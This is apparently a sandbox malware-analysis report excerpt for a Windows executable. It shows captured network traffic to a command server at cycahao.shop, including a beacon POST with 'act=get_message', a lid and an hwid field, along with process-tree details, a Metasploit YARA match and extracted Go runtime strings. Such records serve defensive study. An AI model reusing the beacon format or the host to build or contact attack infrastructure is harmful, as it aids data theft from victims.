                                                                            Data Ascii: @8^'DKEBB[i ,Hd%aohy%~[g~BK^"Am0NMY%"9~e8`Tc<zxE~ed'ME:dJ,/nHha|AQM'GfOE{gA>n<WWDe-KE5<"^t
                                                                            2024-12-27 07:20:46 UTC15331OUTData Raw: 08 b1 59 b8 98 32 7a dd 67 d2 b1 b1 a5 cb 10 21 e7 1d 3a 6d 5e ba d6 1a 4f 72 87 0d 6a 32 a7 a3 1f d5 21 21 9f 87 67 6e 90 48 ad d7 e6 23 27 7b 25 b4 48 36 24 7a 72 8a 08 5b a4 f6 ec 02 26 e0 b5 7f 04 75 7a cf ec 43 2d 61 53 83 b5 de 9b 82 9b 3b ad bb c7 3b 9d 3b f4 12 41 b0 55 2a cc 56 e6 36 7c 43 24 97 1c 1b b2 70 88 38 da e2 d0 b8 1b 44 e9 4b b5 6e ed 54 9b 53 40 2c eb 42 7f 62 ff f4 4b 1d f0 a3 b7 21 46 95 f3 5e 46 a9 29 36 e1 99 ea a2 2f 4f 72 6c 16 ed 5b a4 3e 93 d4 ae cf fe fc a7 90 9a f1 12 b5 66 fd ae e3 86 65 4a a9 68 7a 7b 43 09 ef 7c 1a 75 ea 8a 5d e2 bc 1f af 21 6f af 54 a0 75 40 24 65 99 b8 ea 55 a2 bf 3d 71 f9 0a ef de d5 aa 81 e0 81 b3 33 b0 df 9d fe 12 8e 79 4e d5 84 f0 14 8c 28 81 7b 93 84 34 08 e8 7f 0f 77 3d 9d 75 46 f2 a0 49 0f da a5
                                                                            Data Ascii: Y2zg!:m^Orj2!!gnH#'{%H6$zr[&uzC-aS;;;AU*V6|C$p8DKnTS@,BbK!F^F)6/Orl[>feJhz{C|u]!oTu@$eU=q3yN({4w=uFI
                                                                            2024-12-27 07:20:46 UTC15331OUTData Raw: d3 c9 04 e9 b8 4e 3a da ca c7 5e 98 4c 61 dd e9 85 86 2c 12 71 3a ee c1 d1 1b 37 7a 11 80 74 55 eb de 10 e5 98 2a 71 b2 84 4d 61 b6 32 c1 a1 40 16 6c 1d 18 8e 81 72 05 c0 97 ec ae a2 d5 74 48 df 19 b0 c4 49 49 68 54 6e 5a 23 88 95 17 05 f2 7f 5e e2 e4 81 2c 33 f6 c9 cf d8 29 1c 6c d6 8e 03 f9 fa a8 e8 64 2b 03 87 52 a1 c0 a1 88 dc 34 be 68 e4 30 1a 33 6b 5d 43 9b 23 2d d8 c2 8d 3c c4 4e c0 c6 76 1e f8 98 af 51 ed 72 16 79 41 00 fe 65 99 5b 9b 5c 75 89 53 f2 11 7b 9a 2e 2c 76 59 20 e6 fb e8 ce 99 cb cf 2c e5 7b 2f 4c d9 a3 63 79 33 9a a6 d4 4c 59 fd 74 0d cc 7f 5e ab 7b 6f 02 1f fb 01 d1 e4 56 50 37 5b d7 78 cd 65 10 ef 8e 85 37 b2 fb ee b9 1f 18 95 83 23 15 49 67 00 32 c1 2b 2e 06 72 b9 57 fd c6 c6 3e 90 ae 12 49 27 28 14 39 64 17 76 5c 14 c4 1c da 6d 85
                                                                            Data Ascii: N:^La,q:7ztU*qMa2@lrtHIIhTnZ#^,3)ld+R4h03k]C#-<NvQryAe[\uS{.,vY ,{/Lcy3LYt^{oVP7[xe7#Ig2+.rW>I'(9dv\m
                                                                            2024-12-27 07:20:46 UTC15331OUTData Raw: a4 b4 95 97 61 e8 bf 10 b7 be 38 a2 b0 cd 72 c3 bf bc b8 c4 d8 a6 ac 53 2c bc 82 9a fe 9c 59 29 ca 7d 35 99 44 91 d2 d6 f8 25 aa 5d 90 c0 89 ee fa 36 6f 6c 19 6c 29 08 d6 e6 6a b6 1a bc b2 dc d2 aa 4c 42 29 42 c0 49 4a db 76 f1 03 84 83 e8 3d ff b7 22 34 7c c7 af 2b fc f4 a1 2e 59 a3 fc aa f5 1d c7 4a dd ce 4f 08 2c 6c 15 62 42 ac 89 9b 0d 64 5d 3c b6 08 de a9 3c 67 8a 8b 8c d1 bc 46 24 36 b5 32 ee c1 7e b7 38 d0 fe bf b5 82 b2 12 28 ee fb 44 a3 80 31 5a 15 a2 06 9e a1 bb c0 09 91 54 be ed 6f 63 b4 14 de e4 fd 48 ca e3 29 fc e8 6b ac 4d 66 fa 53 78 38 04 72 f2 f1 5f 44 58 25 80 f1 83 f1 6d 90 1c f8 46 81 0f b1 16 57 3d f5 80 f0 83 59 20 66 4f 2d 69 36 b7 22 04 9f 2f 8b 46 17 72 65 2e c4 0d a8 a7 61 19 04 84 5b 57 50 99 17 4d ce 31 d4 00 95 c8 98 41 17 3f
                                                                            Data Ascii: a8rS,Y)}5D%]6oll)jLB)BIJv="4|+.YJO,lbBd]<<gF$62~8(D1ZTocH)kMfSx8r_DX%mFW=Y fO-i6"/Fre.a[WPM1A?
                                                                            2024-12-27 07:20:46 UTC15331OUTData Raw: 3d e7 23 b7 c3 b7 17 83 b1 63 d5 ba 91 41 68 86 28 43 78 a2 c4 26 c1 67 db 8e 99 f9 a1 fa ae f3 14 dc 4c 15 f5 8f 90 d9 ae a1 5b 2f ec 0a 0d d8 79 e6 d8 20 2e 6a 58 f4 f7 eb 48 6c 13 8f c3 7a 25 84 eb ee 63 a4 89 07 83 1f d0 c2 a1 31 ab 64 6e c3 14 19 2e 0e c6 1c 17 de c5 62 19 cc e7 7c f3 a2 7f 0f e4 c1 a7 73 6b 38 ef 45 96 b2 ec 13 a9 1a ba 4a 89 de 74 59 9b af 06 dc 12 df 5b b2 c2 12 15 7a 1f db de b6 5a e4 c3 e9 fe e2 26 17 79 77 12 f7 73 c3 e7 e6 e2 46 f4 52 9b bc 42 75 ed 76 d1 b6 d7 49 e2 c7 03 ea f8 48 2a f0 8f 08 56 e5 55 7c 2d c3 e8 10 b1 a5 99 34 46 69 57 e6 12 0b f8 70 fd 17 5d 0c fd 49 37 21 1c 55 c6 c1 3f db d9 29 06 2b 64 6b 64 29 99 43 d4 cc 75 6a 9b 78 8d 0f da 07 88 88 40 17 71 f9 c8 29 a5 f6 54 6c ef aa 6c 7f c4 76 d9 83 80 c5 89 5d f4
                                                                            Data Ascii: =#cAh(Cx&gL[/y .jXHlz%c1dn.b|sk8EJtY[zZ&ywsFRBuvIH*VU|-4FiWp]I7!U?)+dkd)Cujx@q)Tllv]
                                                                            2024-12-27 07:20:46 UTC15331OUTData Raw: a6 7e 64 e5 99 d3 54 a1 ff b8 c4 49 08 cd 97 91 b5 42 d1 cb 63 03 4a 63 fd 0f 4e 3a ba c0 8b ce 2a 91 53 8d 14 73 97 62 75 d7 68 f5 e1 d6 ad 17 bc a0 71 55 cb de ed 72 91 7b df 13 19 e9 56 16 0f 22 46 ab ee ef 8f 5c c9 23 dc e9 db d8 53 1b 54 6d b3 07 d3 af 6e 8f 27 25 b2 f1 35 e6 0c 22 97 04 93 f3 20 f1 63 ca 2a 25 fb 34 52 d5 72 9a 2c c5 44 44 96 76 6d 6b 74 da a1 16 ad 2d df ba 44 d5 6a 54 49 48 6a b6 22 d7 50 58 64 79 fa a8 38 25 08 2d 94 34 e2 e3 4a e5 a2 22 13 b8 55 df 1d f1 07 bd 44 b7 f1 84 34 26 6d 7b 0e 4b 3f ed a6 7d a2 f2 cf b5 e4 03 70 a8 28 4f 56 7a 4e 69 64 c1 2d 34 a2 03 0d 2f 75 ff a7 f4 8c c1 16 5d e6 e7 bd 37 46 74 41 aa 12 c1 e8 ff 6d 00 5b b7 66 f5 ca 81 f6 07 95 27 fe b9 a4 22 b9 49 f3 85 2d ea 9d 90 e1 f5 4b aa ba 18 66 b1 15 5d 8b
                                                                            Data Ascii: ~dTIBcJcN:*SsbuhqUr{V"F\#STmn'%5" c*%4Rr,DDvmkt-DjTIHj"PXdy8%-4J"UD4&m{K?}p(OVzNid-4/u]7FtAm[f'"I-Kf]
                                                                            2024-12-27 07:20:46 UTC15331OUTData Raw: fc a7 15 3b 5b 8a ed da 96 4c 22 ac d1 b0 56 1a 27 27 fb 5d 25 6e 55 a6 f4 8e 64 a5 a3 61 54 38 ea 5a 34 5d 96 1b 98 26 ac c3 d1 df be 66 7f 2b a3 07 82 33 e1 bc 41 a6 68 92 7e 23 f4 cc ba 65 a6 b5 1a db af 9e 84 a7 16 6e fa a5 b2 6f d9 11 58 e3 b7 24 76 a9 ca 52 d8 ad ef b1 6c ec 2d b5 00 1b 38 02 15 89 82 95 bf 6c ca 39 4e ba a0 16 e6 30 f0 33 75 3e b1 ef 7b 86 17 34 60 74 c3 7a 03 e1 04 68 78 08 ef db 75 f5 6e 6e ed 7a 30 fb af 4d 0d 9f 8c f4 35 32 d3 24 6c 1b 1c 4d d9 f5 df 94 fb aa 9d c3 ee 02 fb e7 ba e4 48 cb 6e 44 ea af 79 58 02 d1 79 bc 25 2e b4 c6 32 df c5 09 07 0d 3b 63 49 6e 0c 38 7c cf c1 c6 45 91 8e fe af 2f 95 52 b8 da f8 37 3b a8 69 4a 29 ff 5a 6d 1b a8 0c e4 8f 99 67 ba 85 f7 f9 20 5b 6a cb d0 d8 be 7f a8 59 fb 63 7f 92 1a 43 56 d2 23 12
                                                                            Data Ascii: ;[L"V'']%nUdaT8Z4]&f+3Ah~#enoX$vRl-8l9N03u>{4`tzhxunnz0M52$lMHnDyXy%.2;cIn8|E/R7;iJ)Zmg [jYcCV#
                                                                            2024-12-27 07:20:48 UTC1040INHTTP/1.1 200 OK
                                                                            Date: Fri, 27 Dec 2024 07:20:48 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=570m1hnsn65h7q42c9rt2qogb4; expires=Tue, 22-Apr-2025 01:07:27 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1cq6B%2BPIowJ%2FmNFqfuBrVJaRVLjS1wBlq0DS87GSckgb7iLOKfI0%2FX3Kno0YLTIUcnfuXPvtvp1KAGDWD1engFax877BvS%2BCbgYZAjSAqZW1rK8BUi8yHQapR0rMvHc%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f878ccc2eb82369-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1797&min_rtt=1781&rtt_var=700&sent=202&recv=583&lost=0&retrans=0&sent_bytes=2825&recv_bytes=560350&delivery_rate=1528795&cwnd=142&unsent_bytes=0&cid=6bfabb8bcf08e126&ts=2178&x=0"


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.649801172.67.135.139443612C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-27 07:20:50 UTC261OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 113
                                                                            Host: cycahao.shop
                                                                            2024-12-27 07:20:50 UTC113OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 56 49 4b 41 26 6a 3d 66 62 33 64 65 30 39 36 65 37 62 66 31 66 39 65 61 32 36 30 36 30 64 34 63 66 61 39 33 39 65 62 26 68 77 69 64 3d 41 44 46 33 42 38 43 31 34 42 46 46 33 44 41 43 31 31 34 35 32 33 37 37 39 38 44 46 38 43 43 32
                                                                            Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--VIKA&j=fb3de096e7bf1f9ea26060d4cfa939eb&hwid=ADF3B8C14BFF3DAC1145237798DF8CC2
                                                                            2024-12-27 07:20:50 UTC1033INHTTP/1.1 200 OK
                                                                            Date: Fri, 27 Dec 2024 07:20:50 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=5mim7sj7jqij7h05qeasrqhptc; expires=Tue, 22-Apr-2025 01:07:29 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K3dF1x7Bixyu6tfGXxrVijVT%2FKLDDIcxW5J5ABMWEbidtCAzCk7eZCkWeO1Jt%2BHANhdUD%2FocVJEyUmZzXgbv%2FBcQsPEUuQc8fhKGGBM1vJYBlr0xvCXmRjgZdbcjv20%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f878ce2e875c33b-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1571&rtt_var=603&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1010&delivery_rate=1794714&cwnd=171&unsent_bytes=0&cid=3f0eee69a08fc92d&ts=780&x=0"
                                                                            2024-12-27 07:20:50 UTC138INData Raw: 38 34 0d 0a 56 65 50 30 6e 53 73 51 69 66 69 76 39 78 36 4d 53 31 69 76 55 70 31 75 49 68 44 6d 67 43 63 50 72 4b 37 54 46 6c 69 73 50 71 41 4f 6d 4e 62 6f 43 53 71 72 6b 4e 75 44 62 76 39 78 42 49 41 4f 73 67 56 4f 65 5a 62 30 54 6e 58 64 67 4b 42 2b 4e 39 78 69 6a 7a 79 4e 67 4d 4a 49 66 50 6d 6e 77 35 4e 73 30 7a 67 77 7a 6e 7a 70 46 6c 59 79 79 71 4a 42 65 34 36 55 34 54 70 36 79 52 79 61 5a 4a 36 70 0d 0a
                                                                            Data Ascii: 84VeP0nSsQifiv9x6MS1ivUp1uIhDmgCcPrK7TFlisPqAOmNboCSqrkNuDbv9xBIAOsgVOeZb0TnXdgKB+N9xijzyNgMJIfPmnw5Ns0zgwznzpFlYyyqJBe46U4Tp6yRyaZJ6p
                                                                            2024-12-27 07:20:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to dive into process behavior distribution

                                                                            Click to jump to process

                                                                            Target ID:0
                                                                            Start time:02:20:04
                                                                            Start date:27/12/2024
                                                                            Path:C:\Users\user\Desktop\6wFwugeLNG.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\6wFwugeLNG.exe"
                                                                            Imagebase:0xf40000
                                                                            File size:11'141'120 bytes
                                                                            MD5 hash:16B7635BD33367D455F26ADC148DBFC3
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2391539251.0000000009E4A000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                            • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2391539251.0000000009F30000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:2
                                                                            Start time:02:20:14
                                                                            Start date:27/12/2024
                                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:reg query HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon /v version
                                                                            Imagebase:0x2a0000
                                                                            File size:59'392 bytes
                                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:3
                                                                            Start time:02:20:14
                                                                            Start date:27/12/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff66e660000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:5
                                                                            Start time:02:20:26
                                                                            Start date:27/12/2024
                                                                            Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                            Imagebase:0x930000
                                                                            File size:231'736 bytes
                                                                            MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Reset < >
                                                                              Strings
                                                                              • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00F73771
                                                                              • runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected g statusunknown Go type: %vunknown certificateunknown ciphe, xrefs: 00F736DB
                                                                              • bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedchan receiveclose notifycontent-typecontext.TODOcritmsgcountdumping heapend tracegcentersyscallexit status formatid = 'freeaddrinfogcBitsArenasgcpacertracegetaddrinfowharddeco, xrefs: 00F7374A
                                                                              • CreateWaitableTimerEx when creating timer failed[%LEVEL] %RelFile:%Func.%Line %Date %Time %Msg%nasync adaptive logger min interval should be > 0bufio: writer returned negative count from Writecould not find GetSystemTimeAsFileTime() syscallfail to read symbol , xrefs: 00F73800
                                                                              • : duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not, xrefs: 00F73827
                                                                              • : duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextpstrings: Repeat count causes overflowtimezone hour outside of range [0,23]t, xrefs: 00F7385B
                                                                              • %, xrefs: 00F73864
                                                                              • runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state , xrefs: 00F737CC
                                                                              • VirtualQuery for stack base failedadaptive logger parameters not setadding nil Certificate to CertPoolarchive/tar: header field too longarchive/tar: sockets not supportedchacha20: wrong HChaCha20 key size : invalid buffer overlapcrypto/des: invalid bu, xrefs: 00F737A5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2389252011.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true
                                                                              • Associated: 00000000.00000002.2389214126.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2389510096.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2389510096.000000000130A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2389782784.00000000014E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2389805411.00000000014EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2389838069.0000000001514000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2389868346.0000000001516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2389891437.0000000001517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2389910609.0000000001519000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2389930550.000000000151B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2389930550.0000000001523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2389930550.0000000001543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2389930550.0000000001548000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2390025571.000000000154B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2390046064.000000000154C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2390046064.0000000001570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_f40000_6wFwugeLNG.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: : duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not$ : duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextpstrings: Repeat count causes overflowtimezone hour outside of range [0,23]t$%$CreateWaitableTimerEx when creating timer failed[%LEVEL] %RelFile:%Func.%Line %Date %Time %Msg%nasync adaptive logger min interval should be > 0bufio: writer returned negative count from Writecould not find GetSystemTimeAsFileTime() syscallfail to read symbol $VirtualQuery for stack base failedadaptive logger parameters not setadding nil Certificate to CertPoolarchive/tar: header field too longarchive/tar: sockets not supportedchacha20: wrong HChaCha20 key size : invalid buffer overlapcrypto/des: invalid bu$bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedchan receiveclose notifycontent-typecontext.TODOcritmsgcountdumping heapend tracegcentersyscallexit status formatid = 'freeaddrinfogcBitsArenasgcpacertracegetaddrinfowharddeco$runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state $runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected g statusunknown Go type: %vunknown certificateunknown ciphe
                                                                              • API String ID: 0-138150089
                                                                              • Opcode ID: a3e0efe5e2af5f171eab66401e847e36ec8a67bb1736554a4df48fc1f3baf2b9
                                                                              • Instruction ID: d6c73eb100865f09e1f7be7c7e1246538d27331766843e92c4b3201b585ad5b1
                                                                              • Opcode Fuzzy Hash: a3e0efe5e2af5f171eab66401e847e36ec8a67bb1736554a4df48fc1f3baf2b9
                                                                              • Instruction Fuzzy Hash: 6781D1B45087019FD300EF68D589B5ABBE4BF88744F01892EF4989B342DB78D945AF53
                                                                              Strings
                                                                              • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchsnappy: corrupt inputsplitDispatcher ->%sstale NFS file handlestartlockedm: m has pstartm: m is spinningstate no, xrefs: 00F837B1
                                                                              • releasep: m=remote errorruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstoo long inttraceStringstransmitfileunexpected )unknown portwintrust.dllwirep: p->m=worker mode wtsapi32.dll ->%s != swe, xrefs: 00F836F9
                                                                              • m->p= max= min= next= null p->m= prev= span=% util%%%02x%c[%sm%s: %s%s: %v(...), i = , not , val .local.onion.reloc390625; and <-chanAacuteAgraveAnswerArabicAtildeAugustBrahmiCANCELCDATA[CONIN$CarianCcedilChakmaCommonCopticDaggerENCLogENCMapEacuteEgraveEx, xrefs: 00F8371B
                                                                              • p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC)' attribute) at entry+, elemsize=, npages = -syncWithWU.WithCancel.seelog_tmp/dev/stderr/dev/stdout/index.html30517578125: frame.sp=> in space AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s, xrefs: 00F83767
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2389252011.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true
                                                                              • Associated: 00000000.00000002.2389214126.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2389510096.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2389510096.000000000130A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2389782784.00000000014E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2389805411.00000000014EB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2389838069.0000000001514000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2389868346.0000000001516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2389891437.0000000001517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2389910609.0000000001519000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2389930550.000000000151B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2389930550.0000000001523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2389930550.0000000001543000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2389930550.0000000001548000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2390025571.000000000154B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2390046064.000000000154C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2390046064.0000000001570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_f40000_6wFwugeLNG.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: m->p= max= min= next= null p->m= prev= span=% util%%%02x%c[%sm%s: %s%s: %v(...), i = , not , val .local.onion.reloc390625; and <-chanAacuteAgraveAnswerArabicAtildeAugustBrahmiCANCELCDATA[CONIN$CarianCcedilChakmaCommonCopticDaggerENCLogENCMapEacuteEgraveEx$ p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC)' attribute) at entry+, elemsize=, npages = -syncWithWU.WithCancel.seelog_tmp/dev/stderr/dev/stdout/index.html30517578125: frame.sp=> in space AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchsnappy: corrupt inputsplitDispatcher ->%sstale NFS file handlestartlockedm: m has pstartm: m is spinningstate no$releasep: m=remote errorruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstoo long inttraceStringstransmitfileunexpected )unknown portwintrust.dllwirep: p->m=worker mode wtsapi32.dll ->%s != swe
                                                                              • API String ID: 0-3237958999
                                                                              • Opcode ID: afe0bd259d92043409af73aa4387e9b28fc43992c17481e5e6b4b0cbc1429dea
                                                                              • Instruction ID: 5d80cbb871c5bbb2343e814620895bd1c7c1204a75d99293112a3349ec7c73b6
                                                                              • Opcode Fuzzy Hash: afe0bd259d92043409af73aa4387e9b28fc43992c17481e5e6b4b0cbc1429dea
                                                                              • Instruction Fuzzy Hash: 4031F6B45497058FD300EF28C588B5ABBE0BF88744F01886EE4888B352D779D949EF63

                                                                              Execution Graph

                                                                              Execution Coverage:9.2%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:76.9%
                                                                              Total number of Nodes:303
                                                                              Total number of Limit Nodes:23
